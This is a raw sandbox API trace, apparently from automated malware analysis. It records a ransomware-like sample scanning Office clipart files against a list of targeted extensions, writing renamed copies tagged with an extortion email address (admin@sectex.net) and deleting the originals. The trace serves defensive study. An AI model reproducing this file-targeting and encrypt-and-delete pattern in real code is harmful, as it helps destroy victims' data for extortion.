	[0059.358] ReadFile (in: hFile=0x178, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.358] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.358] SetEndOfFile (hFile=0x194) returned 1
	[0059.358] CloseHandle (hObject=0x194) returned 1
	[0059.359] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.359] SetEndOfFile (hFile=0x178) returned 1
	[0059.359] CloseHandle (hObject=0x178) returned 1
	[0059.359] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.360] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf")) returned 1
	[0059.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63
	[0059.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63
	[0059.360] lstrlenW (lpString=".doc") returned 4
	[0059.360] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.360] lstrlenW (lpString=".docx") returned 5
	[0059.360] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.360] lstrlenW (lpString=".pdf") returned 4
	[0059.360] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.360] lstrlenW (lpString=".xls") returned 4
	[0059.360] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.360] lstrlenW (lpString=".xlsx") returned 5
	[0059.360] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.360] lstrlenW (lpString=".ppt") returned 4
	[0059.360] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63
	[0059.360] lstrlenW (lpString=".zip") returned 4
	[0059.360] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.360] lstrlenW (lpString=".rar") returned 4
	[0059.360] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.360] lstrlenW (lpString=".bz2") returned 4
	[0059.360] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.360] lstrlenW (lpString=".7z") returned 3
	[0059.360] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63
	[0059.361] lstrlenW (lpString=".dbf") returned 4
	[0059.361] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63
	[0059.361] lstrlenW (lpString=".1cd") returned 4
	[0059.361] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63
	[0059.361] lstrlenW (lpString=".jpg") returned 4
	[0059.361] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63
	[0059.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63
	[0059.361] lstrlenW (lpString=".doc") returned 4
	[0059.361] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.361] lstrlenW (lpString=".docx") returned 5
	[0059.361] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.361] lstrlenW (lpString=".pdf") returned 4
	[0059.361] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.361] lstrlenW (lpString=".xls") returned 4
	[0059.361] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.361] lstrlenW (lpString=".xlsx") returned 5
	[0059.361] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.361] lstrlenW (lpString=".ppt") returned 4
	[0059.361] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63
	[0059.361] lstrlenW (lpString=".zip") returned 4
	[0059.361] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.361] lstrlenW (lpString=".rar") returned 4
	[0059.361] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.361] lstrlenW (lpString=".bz2") returned 4
	[0059.361] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.361] lstrlenW (lpString=".7z") returned 3
	[0059.361] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.361] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63
	[0059.362] lstrlenW (lpString=".dbf") returned 4
	[0059.362] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63
	[0059.362] lstrlenW (lpString=".1cd") returned 4
	[0059.362] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.362] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63
	[0059.362] lstrlenW (lpString=".jpg") returned 4
	[0059.362] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.362] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.362] lstrlenW (lpString="AN04269_.WMF") returned 12
	[0059.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0059.362] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=2016) returned 1
	[0059.362] CloseHandle (hObject=0x178) returned 1
	[0059.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf")) returned 0x20
	[0059.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0059.362] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.363] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0059.363] GetLastError () returned 0x0
	[0059.363] ReadFile (in: hFile=0x178, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x7e0, lpOverlapped=0x0) returned 1
	[0059.365] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x7f0, lpOverlapped=0x0) returned 1
	[0059.365] ReadFile (in: hFile=0x178, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.365] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.366] SetEndOfFile (hFile=0x194) returned 1
	[0059.366] CloseHandle (hObject=0x194) returned 1
	[0059.366] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.366] SetEndOfFile (hFile=0x178) returned 1
	[0059.367] CloseHandle (hObject=0x178) returned 1
	[0059.367] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.367] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf")) returned 1
	[0059.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63
	[0059.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63
	[0059.367] lstrlenW (lpString=".doc") returned 4
	[0059.367] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.367] lstrlenW (lpString=".docx") returned 5
	[0059.367] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.367] lstrlenW (lpString=".pdf") returned 4
	[0059.367] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.367] lstrlenW (lpString=".xls") returned 4
	[0059.367] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.367] lstrlenW (lpString=".xlsx") returned 5
	[0059.367] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.367] lstrlenW (lpString=".ppt") returned 4
	[0059.367] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63
	[0059.367] lstrlenW (lpString=".zip") returned 4
	[0059.367] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.367] lstrlenW (lpString=".rar") returned 4
	[0059.368] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.368] lstrlenW (lpString=".bz2") returned 4
	[0059.368] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.368] lstrlenW (lpString=".7z") returned 3
	[0059.368] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63
	[0059.368] lstrlenW (lpString=".dbf") returned 4
	[0059.368] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63
	[0059.368] lstrlenW (lpString=".1cd") returned 4
	[0059.368] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63
	[0059.368] lstrlenW (lpString=".jpg") returned 4
	[0059.368] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63
	[0059.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63
	[0059.368] lstrlenW (lpString=".doc") returned 4
	[0059.368] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.368] lstrlenW (lpString=".docx") returned 5
	[0059.368] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.368] lstrlenW (lpString=".pdf") returned 4
	[0059.368] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.368] lstrlenW (lpString=".xls") returned 4
	[0059.368] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.368] lstrlenW (lpString=".xlsx") returned 5
	[0059.368] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.368] lstrlenW (lpString=".ppt") returned 4
	[0059.368] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63
	[0059.368] lstrlenW (lpString=".zip") returned 4
	[0059.368] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.368] lstrlenW (lpString=".rar") returned 4
	[0059.368] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.368] lstrlenW (lpString=".bz2") returned 4
	[0059.368] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.368] lstrlenW (lpString=".7z") returned 3
	[0059.369] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63
	[0059.369] lstrlenW (lpString=".dbf") returned 4
	[0059.369] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63
	[0059.369] lstrlenW (lpString=".1cd") returned 4
	[0059.369] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63
	[0059.369] lstrlenW (lpString=".jpg") returned 4
	[0059.369] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.369] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.369] lstrlenW (lpString="AN04323_.WMF") returned 12
	[0059.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0059.370] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=2492) returned 1
	[0059.370] CloseHandle (hObject=0x178) returned 1
	[0059.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf")) returned 0x20
	[0059.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0059.370] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.370] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0059.371] GetLastError () returned 0x0
	[0059.371] ReadFile (in: hFile=0x178, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x9bc, lpOverlapped=0x0) returned 1
	[0059.372] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x9c0, lpOverlapped=0x0) returned 1
	[0059.373] ReadFile (in: hFile=0x178, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.373] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.373] SetEndOfFile (hFile=0x194) returned 1
	[0059.373] CloseHandle (hObject=0x194) returned 1
	[0059.373] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.373] SetEndOfFile (hFile=0x178) returned 1
	[0059.374] CloseHandle (hObject=0x178) returned 1
	[0059.374] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.374] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf")) returned 1
	[0059.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63
	[0059.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63
	[0059.375] lstrlenW (lpString=".doc") returned 4
	[0059.375] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.375] lstrlenW (lpString=".docx") returned 5
	[0059.375] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.375] lstrlenW (lpString=".pdf") returned 4
	[0059.375] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.375] lstrlenW (lpString=".xls") returned 4
	[0059.375] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.375] lstrlenW (lpString=".xlsx") returned 5
	[0059.375] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.375] lstrlenW (lpString=".ppt") returned 4
	[0059.375] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63
	[0059.375] lstrlenW (lpString=".zip") returned 4
	[0059.375] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.375] lstrlenW (lpString=".rar") returned 4
	[0059.375] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.375] lstrlenW (lpString=".bz2") returned 4
	[0059.375] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.375] lstrlenW (lpString=".7z") returned 3
	[0059.375] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63
	[0059.375] lstrlenW (lpString=".dbf") returned 4
	[0059.375] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63
	[0059.375] lstrlenW (lpString=".1cd") returned 4
	[0059.375] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63
	[0059.375] lstrlenW (lpString=".jpg") returned 4
	[0059.375] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63
	[0059.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63
	[0059.376] lstrlenW (lpString=".doc") returned 4
	[0059.376] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.376] lstrlenW (lpString=".docx") returned 5
	[0059.376] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.376] lstrlenW (lpString=".pdf") returned 4
	[0059.376] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.376] lstrlenW (lpString=".xls") returned 4
	[0059.376] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.376] lstrlenW (lpString=".xlsx") returned 5
	[0059.376] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.376] lstrlenW (lpString=".ppt") returned 4
	[0059.376] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63
	[0059.376] lstrlenW (lpString=".zip") returned 4
	[0059.376] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.376] lstrlenW (lpString=".rar") returned 4
	[0059.376] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.376] lstrlenW (lpString=".bz2") returned 4
	[0059.376] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.376] lstrlenW (lpString=".7z") returned 3
	[0059.376] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63
	[0059.376] lstrlenW (lpString=".dbf") returned 4
	[0059.376] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63
	[0059.376] lstrlenW (lpString=".1cd") returned 4
	[0059.376] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63
	[0059.376] lstrlenW (lpString=".jpg") returned 4
	[0059.376] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.377] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.377] lstrlenW (lpString="AN04326_.WMF") returned 12
	[0059.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0059.377] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=3348) returned 1
	[0059.377] CloseHandle (hObject=0x178) returned 1
	[0059.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf")) returned 0x20
	[0059.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178
	[0059.377] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.377] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0059.378] GetLastError () returned 0x0
	[0059.378] ReadFile (hFile=0x178, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0) 

Thread:
	id = 11
	os_tid = 0x980

	[0032.810] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0xab70048
	[0032.811] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0xab80050
	[0032.812] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08e98
	[0032.812] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x6) returned 0x7e17b50
	[0032.812] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08eb0
	[0032.812] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x100000) returned 0xac70020
	[0032.812] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08ec8
	[0032.812] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08ec8, Size=0x20) returned 0x7df2f90
